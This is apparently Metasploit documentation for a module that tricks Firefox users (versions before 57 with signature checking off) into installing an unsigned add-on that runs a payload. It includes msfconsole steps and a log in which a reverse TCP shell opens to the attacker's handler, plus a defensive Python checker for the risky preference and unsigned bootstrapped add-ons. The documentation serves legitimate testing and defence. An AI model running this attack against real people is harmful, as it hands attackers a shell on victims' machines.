Vulnerable Application
Mozilla Firefox before version 41 allowed users to install unsigned browser extensions from arbitrary web servers.
This module dynamically creates an unsigned .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page. The victim's Firefox browser will pop a dialog asking if they trust the addon.
Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.
As of Firefox 41, unsigned extensions can still be installed on Firefox Nightly, Unbranded and Development builds when configured with xpinstall.signatures.required set to false.
Note: this module generates legacy extensions which are supported only in Firefox before version 57.
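A defender-side check for the conditions described above, as an added example that is not part of the module or its documentation: it flags a Firefox profile whose prefs set xpinstall.signatures.required to false, and inspects an .xpi for missing signature files and the legacy bootstrap marker. The META-INF file names and the install.rdf em:bootstrap marker come from general knowledge of the XPI format rather than from this page, and the sample prefs and add-on are constructed.

```python
import io
import re
import zipfile

# Matches the pref in prefs.js / user.js (user_pref) or AutoConfig files (pref, lockPref, defaultPref).
PREF_RE = re.compile(
    r'^\s*(?:user_pref|pref|lockPref|defaultPref)\(\s*"xpinstall\.signatures\.required"\s*,'
    r'\s*(true|false)\s*\)\s*;', re.M)
# Files a Mozilla-signed XPI carries; presence is only a layout check, not verification.
SIGNATURE_FILES = {"META-INF/manifest.mf", "META-INF/mozilla.sf", "META-INF/mozilla.rsa"}
# Element form (<em:bootstrap>true) or attribute form (em:bootstrap="true") in install.rdf.
BOOTSTRAP_RE = re.compile(r'em:bootstrap(?:>\s*|\s*=\s*")true')


def signatures_enforced(prefs_text):
    """False only when the last setting of the pref in the text is false."""
    values = PREF_RE.findall(prefs_text)
    return not values or values[-1] == "true"


def inspect_xpi(data):
    """Classify an XPI (zip bytes) by signature layout and legacy bootstrap markers."""
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        names = set(xpi.namelist())
        rdf = xpi.read("install.rdf").decode("utf-8", "replace") if "install.rdf" in names else ""
    return {
        "has_signature_files": SIGNATURE_FILES <= names,
        "legacy_install_rdf": "install.rdf" in names,
        "bootstrapped": bool(BOOTSTRAP_RE.search(rdf)),
    }


def build_sample_xpi():
    """Constructed sample: an unsigned legacy add-on with a bootstrap marker."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as xpi:
        xpi.writestr("install.rdf", "<RDF><Description><em:id>sample@example.invalid</em:id>"
                     "<em:bootstrap>true</em:bootstrap></Description></RDF>")
        xpi.writestr("bootstrap.js", "function startup() {}")
    return buf.getvalue()


# Constructed prefs.js content, as left behind by the about:config change.
SAMPLE_PREFS = ('user_pref("browser.startup.page", 3);\n'
                'user_pref("xpinstall.signatures.required", false);\n')

if __name__ == "__main__":
    print("signature enforcement on:", signatures_enforced(SAMPLE_PREFS))
    print("sample xpi:", inspect_xpi(build_sample_xpi()))
```

A profile that reports enforcement off, or an add-on that is bootstrapped and lacks the signature files, is worth a closer look on any host that is not a dedicated test machine.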
Installation
Download an old Developer Edition (version 4 < 57) installer from:
Browse to about:config and set xpinstall.signatures.required to false.
Open Tools -> Options, search for "updates" and select "Never check for updates".
Verification Steps
- Start msfconsole
- Do: use exploit/multi/browser/firefox_xpi_bootstrapped_addon
- Do: set SRVHOST [IP]
- Do: run
Options
Scenarios
Firefox Developer Edition 56.0b9 on Windows 7 SP1 (x64) with xpinstall.signatures.required disabled
Run the module and load the web server URL in Firefox. Install the extension when prompted.
msf6 post(windows/gather/enum_domains) > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] Using URL: http://192.168.200.130:8080/Oj8qCs
[*] Server started.
msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) >
[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Redirecting request.
[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending HTML response.
[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
[*] 192.168.200.190 firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.190:49861) at 2022-09-04 01:46:40 -0400